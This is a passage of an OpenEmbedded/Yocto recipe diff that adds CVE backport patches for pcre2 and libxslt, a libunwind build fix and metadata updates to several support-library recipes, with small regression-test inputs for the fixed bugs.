+-  flush_stubs(common);
+-  common->currententry = common->currententry->next;
+   }
+ common->local_quit_available = FALSE;
+ common->quit_label = quit_label;
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index 9df87fd..2f84834 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -746,6 +746,7 @@ static struct regression_test_case regression_test_cases[] = {
+ 	{ MU, A, 0, 0, "((?(R)a|(?1)){1,3}?)M", "aaaM" },
+ 	{ MU, A, 0, 0, "((.)(?:.|\\2(?1))){0}#(?1)#", "#aabbccdde# #aabbccddee#" },
+ 	{ MU, A, 0, 0, "((.)(?:\\2|\\2{4}b)){0}#(?:(?1))+#", "#aaaab# #aaaaab#" },
++	{ MU, A, 0, 0 | F_NOMATCH, "(?1)$((.|\\2xx){1,2})", "abc" },
+ 
+ 	/* 16 bit specific tests. */
+ 	{ CM, A, 0, 0 | F_FORCECONV, "\xc3\xa1", "\xc3\x81\xc3\xa1" },
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
new file mode 100644
index 0000000000..882277ae73
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
@@ -0,0 +1,74 @@
+From 94e1c001761373b7d9450768aa15d04c25547a35 Mon Sep 17 00:00:00 2001
+From: Philip Hazel <Philip.Hazel@gmail.com>
+Date: Tue, 16 Aug 2022 17:00:45 +0100
+Subject: [PATCH] Diagnose negative repeat value in pcre2test subject line
+
+CVE: CVE-2022-41409
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ ChangeLog            | 3 +++
+ src/pcre2test.c      | 4 ++--
+ testdata/testinput2  | 3 +++
+ testdata/testoutput2 | 4 ++++
+ 4 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index eab50eb7..276eb57a 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -7,6 +7,9 @@ fully read in caseless matching.
+ 24. Fixed an issue affecting recursions in JIT caused by duplicated data
+ transfers.
+ 
++20. A negative repeat value in a pcre2test subject line was not being 
++diagnosed, leading to infinite looping.
++
+ 
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2test.c b/src/pcre2test.c
+index 08f86096..f6f5d66c 100644
+--- a/src/pcre2test.c
++++ b/src/pcre2test.c
+@@ -6700,9 +6700,9 @@ while ((c = *p++) != 0)
+       }
+ 
+     i = (int32_t)li;
+-    if (i-- == 0)
++    if (i-- <= 0)
+       {
+-      fprintf(outfile, "** Zero repeat not allowed\n");
++      fprintf(outfile, "** Zero or negative repeat not allowed\n");
+       return PR_OK;
+       }
+ 
+diff --git a/testdata/testinput2 b/testdata/testinput2
+index 655e519..14e00ed 100644
+--- a/testdata/testinput2
++++ b/testdata/testinput2
+@@ -5772,4 +5772,7 @@ a)"xI
+ /(a)?a/I
+     manm
+ 
++--
++    \[X]{-10}
++
+ # End of testinput2
+diff --git a/testdata/testoutput2 b/testdata/testoutput2
+index c733c12..958f246 100644
+--- a/testdata/testoutput2
++++ b/testdata/testoutput2
+@@ -17435,6 +17435,10 @@ Subject length lower bound = 1
+     manm
+  0: a
+ 
++--
++    \[X]{-10}
++** Zero or negative repeat not allowed
++
+ # End of testinput2
+ Error -70: PCRE2_ERROR_BADDATA (unknown error number)
+ Error -62: bad serialized data
diff --git a/meta/recipes-support/libpcre/libpcre2_10.34.bb b/meta/recipes-support/libpcre/libpcre2_10.34.bb
index fa8655e027..53277270d2 100644
--- a/meta/recipes-support/libpcre/libpcre2_10.34.bb
+++ b/meta/recipes-support/libpcre/libpcre2_10.34.bb
@@ -10,8 +10,12 @@ SECTION = "devel"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37"
 
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \
+SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \
            file://pcre-cross.patch \
+           file://CVE-2022-1586.patch \
+           file://CVE-2022-1586-regression.patch \
+	    file://CVE-2022-1587.patch \
+	    file://CVE-2022-41409.patch \
 "
 
 SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366"
diff --git a/meta/recipes-support/libpcre/libpcre_8.44.bb b/meta/recipes-support/libpcre/libpcre_8.44.bb
index e5471e81da..3267c5ad72 100644
--- a/meta/recipes-support/libpcre/libpcre_8.44.bb
+++ b/meta/recipes-support/libpcre/libpcre_8.44.bb
@@ -7,8 +7,7 @@ HOMEPAGE = "http://www.pcre.org"
 SECTION = "devel"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \
-           file://fix-pcre-name-collision.patch \
+SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \
            file://run-ptest \
            file://Makefile \
            "
diff --git a/meta/recipes-support/libproxy/libproxy_0.4.15.bb b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
index 6f704d7a91..6c7d5a68a1 100644
--- a/meta/recipes-support/libproxy/libproxy_0.4.15.bb
+++ b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Library providing automatic proxy configuration management"
+DESCRIPTION = "libproxy  provides  interfaces  to  get  the proxy that will be \
+used to access network resources. It uses various plugins to get proxy \
+configuration  via different mechanisms (e.g. environment variables or \
+desktop settings)."
 HOMEPAGE = "https://github.com/libproxy/libproxy"
 BUGTRACKER = "https://github.com/libproxy/libproxy/issues"
 SECTION = "libs"
diff --git a/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
index 9831b4b94f..66e64f785c 100644
--- a/meta/recipes-support/libpsl/libpsl_0.21.0.bb
+++ b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
@@ -1,4 +1,10 @@
 SUMMARY = "Public Suffix List library"
+DESCRIPTION = "The libpsl package provides a library for accessing and \
+resolving information from the Public Suffix List (PSL). The PSL is a set of \
+domain names beyond the standard suffixes, such as .com."
+
+HOMEPAGE = "https://rockdaboot.github.io/libpsl/"
+BUGTRACKER = "https://github.com/rockdaboot/libpsl/issues"
 
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \
@@ -13,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6
 
 UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases"
 
-DEPENDS = "libidn2"
-
 inherit autotools gettext gtk-doc manpages pkgconfig lib_package
 
-PACKAGECONFIG ??= ""
+PACKAGECONFIG ?= "idn2"
 PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native"
-
+PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu"
+PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring"
 BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
index 6731b3373e..e42ac30bf2 100644
--- a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
+++ b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
@@ -1,11 +1,13 @@
 SUMMARY = "An HTTP library implementation in C"
+DESCRIPTION = "libsoup is an HTTP client/server library for GNOME. It uses GObjects \
+and the glib main loop, to integrate well with GNOME applications."
 HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup"
 BUGTRACKER = "https://bugzilla.gnome.org/"
 SECTION = "x11/gnome/libs"
 LICENSE = "LGPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
 
-DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl"
+DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl"
 
 SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}"
 
@@ -40,4 +42,4 @@ DEBIAN_NOAUTONAME_${PN} = "1"
 # glib-networking is needed for SSL, proxies, etc.
 RRECOMMENDS_${PN} = "glib-networking"
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
index 97fac4ecfa..2197b6656d 100644
--- a/meta/recipes-support/libunistring/libunistring_0.9.10.bb
+++ b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
@@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \
                     file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \
                     file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \
                    "
+DEPENDS = "gperf-native"
 
 SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \
            file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \
diff --git a/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
new file mode 100644
index 0000000000..34a1f46b0f
--- /dev/null
+++ b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
@@ -0,0 +1,420 @@
+From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001
+From: Yichao Yu <yyc1992@gmail.com>
+Date: Tue, 31 Mar 2020 00:43:32 -0400
+Subject: [PATCH] Fix compilation with -fno-common.
+
+[Khem Raj]
+Making all other archs consistent with IA64 which should not have this problem.
+Also move the FIXME to the correct place.
+
+Also add some minimum comments about this...
+
+[Philippe Coval]
+
+Patch ported to v1.3-stable branch,
+patch to be used used in openembedded-core dunfell branch (on v1.3.1)
+for oniro project.
+
+Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Thanks-to: Yichao Yu <yyc1992@gmail.com>
+Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e
+Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191
+Forwarded: https://github.com/libunwind/libunwind/pull/312
+Last-Update: 2021-11-25
+Signed-off-by: Philippe Coval <philippe.coval@huawei.com>
+---
+ src/aarch64/Ginit.c                        | 15 +++++++--------
+ src/arm/Ginit.c                            | 15 +++++++--------
+ src/coredump/_UPT_get_dyn_info_list_addr.c |  5 +++++
+ src/hppa/Ginit.c                           | 15 +++++++--------
+ src/ia64/Ginit.c                           |  1 +
+ src/mi/Gfind_dynamic_proc_info.c           |  1 +
+ src/mips/Ginit.c                           | 15 +++++++--------
+ src/ppc32/Ginit.c                          | 11 +++++++----
+ src/ppc64/Ginit.c                          | 11 +++++++----
+ src/ptrace/_UPT_get_dyn_info_list_addr.c   |  5 +++++
+ src/sh/Ginit.c                             | 15 +++++++--------
+ src/tilegx/Ginit.c                         | 15 +++++++--------
+ src/x86/Ginit.c                            | 15 +++++++--------
+ src/x86_64/Ginit.c                         | 15 +++++++--------
+ 14 files changed, 82 insertions(+), 72 deletions(-)
+
+diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c
+index 9c4eae82..cb954b15 100644
+--- a/src/aarch64/Ginit.c
++++ b/src/aarch64/Ginit.c
+@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -78,7 +71,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c
+index 2720d063..0bac0d72 100644
+--- a/src/arm/Ginit.c
++++ b/src/arm/Ginit.c
+@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c
+index 0d119055..739ed056 100644
+--- a/src/coredump/_UPT_get_dyn_info_list_addr.c
++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c
+@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ 
+ #else
+ 
++/* XXX fix me: there is currently no way to locate the dyn-info list
++       by a remote unwinder.  On ia64, this is done via a special
++       unwind-table entry.  Perhaps something similar can be done with
++       DWARF2 unwind info.  */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+                int *countp)
+diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c
+index 461e4b93..265455a6 100644
+--- a/src/hppa/Ginit.c
++++ b/src/hppa/Ginit.c
+@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c
+index b09a2ad5..8601bb3c 100644
+--- a/src/ia64/Ginit.c
++++ b/src/ia64/Ginit.c
+@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+   if (!_U_dyn_info_list_addr)
+     return -UNW_ENOINFO;
+ #endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+   *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c
+index 98d35012..2e7c62e5 100644
+--- a/src/mi/Gfind_dynamic_proc_info.c
++++ b/src/mi/Gfind_dynamic_proc_info.c
+@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi,
+     return -UNW_ENOINFO;
+ #endif
+ 
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+   list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr ();
+   for (di = list->first; di; di = di->next)
+     if (ip >= di->start_ip && ip < di->end_ip)
+diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c
+index 3df170c7..bf7a8f5a 100644
+--- a/src/mips/Ginit.c
++++ b/src/mips/Ginit.c
+@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -86,7 +79,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c
+index ba302448..7b454558 100644
+--- a/src/ppc32/Ginit.c
++++ b/src/ppc32/Ginit.c
+@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -104,7 +101,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c
+index 4c88cd6e..7bfb395a 100644
+--- a/src/ppc64/Ginit.c
++++ b/src/ppc64/Ginit.c
+@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -108,7 +105,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+index cc5ed044..16671d45 100644
+--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c
++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ 
+ #else
+ 
++/* XXX fix me: there is currently no way to locate the dyn-info list
++       by a remote unwinder.  On ia64, this is done via a special
++       unwind-table entry.  Perhaps something similar can be done with
++       DWARF2 unwind info.  */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+                int *countp)
+diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c
+index 52988a72..9fe96d2b 100644
+--- a/src/sh/Ginit.c
++++ b/src/sh/Ginit.c
+@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -75,7 +68,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c
+index 7564a558..925e6413 100644
+--- a/src/tilegx/Ginit.c
++++ b/src/tilegx/Ginit.c
+@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c
+index f6b8dc27..3cec74a2 100644
+--- a/src/x86/Ginit.c
++++ b/src/x86/Ginit.c
+@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+ 
+ # endif /* UNW_LOCAL_ONLY */
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -71,7 +64,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c
+index b7e8e462..fe6bcc33 100644
+--- a/src/x86_64/Ginit.c
++++ b/src/x86_64/Ginit.c
+@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space;
+ 
+ unw_addr_space_t unw_local_addr_space = &local_addr_space;
+ 
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+-       by a remote unwinder.  On ia64, this is done via a special
+-       unwind-table entry.  Perhaps something similar can be done with
+-       DWARF2 unwind info.  */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -66,7 +59,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+                         void *arg)
+ {
+-  *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++  if (!_U_dyn_info_list_addr)
++    return -UNW_ENOINFO;
++#endif
++  // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++  *dyn_info_list_addr = _U_dyn_info_list_addr ();
+   return 0;
+ }
+ 
+-- 
+2.32.0
+
diff --git a/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
index 037e04c3c0..8ae94a834c 100644
--- a/meta/recipes-support/libunwind/libunwind_1.3.1.bb
+++ b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
@@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV
            file://0004-Fix-build-on-mips-musl.patch \
            file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \
            file://0006-Fix-for-X32.patch \
+           file://0001-Fix-compilation-with-fno-common.patch \
            "
 SRC_URI_append_libc-musl = " file://musl-header-conflict.patch"
 
diff --git a/meta/recipes-support/liburcu/liburcu_0.11.1.bb b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
index 6a517e6f29..1902415c90 100644
--- a/meta/recipes-support/liburcu/liburcu_0.11.1.bb
+++ b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Userspace RCU (read-copy-update) library"
+DESCRIPTION = "A userspace RCU (read-copy-update) library. This data \
+synchronization library provides read-side access which scales linearly \
+with the number of cores. "
 HOMEPAGE = "http://lttng.org/urcu"
 BUGTRACKER = "http://lttng.org/project/issues"
 
diff --git a/meta/recipes-support/libusb/libusb1_1.0.22.bb b/meta/recipes-support/libusb/libusb1_1.0.22.bb
index 1d9d772575..ffa8f0320c 100644
--- a/meta/recipes-support/libusb/libusb1_1.0.22.bb
+++ b/meta/recipes-support/libusb/libusb1_1.0.22.bb
@@ -1,5 +1,7 @@
 SUMMARY = "Userspace library to access USB (version 1.0)"
-HOMEPAGE = "http://libusb.sf.net"
+DESCRIPTION = "A cross-platform library to access USB devices from Linux, \
+macOS, Windows, OpenBSD/NetBSD, Haiku and Solaris userspace."
+HOMEPAGE = "https://libusb.info"
 BUGTRACKER = "http://www.libusb.org/report"
 SECTION = "libs"
 
@@ -8,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
 
 BBCLASSEXTEND = "native nativesdk"
 
-SRC_URI = "${SOURCEFORGE_MIRROR}/libusb/libusb-${PV}.tar.bz2 \
+SRC_URI = "https://github.com/libusb/libusb/releases/download/v${PV}/libusb-${PV}.tar.bz2 \
            file://no-dll.patch \
            file://run-ptest \
           "
diff --git a/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
new file mode 100644
index 0000000000..614047ea7a
--- /dev/null
+++ b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
@@ -0,0 +1,201 @@
+From 50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 12 Jun 2021 20:02:53 +0200
+Subject: [PATCH] Fix use-after-free in xsltApplyTemplates
+
+xsltApplyTemplates without a select expression could delete nodes in
+the source document.
+
+1. Text nodes with strippable whitespace
+
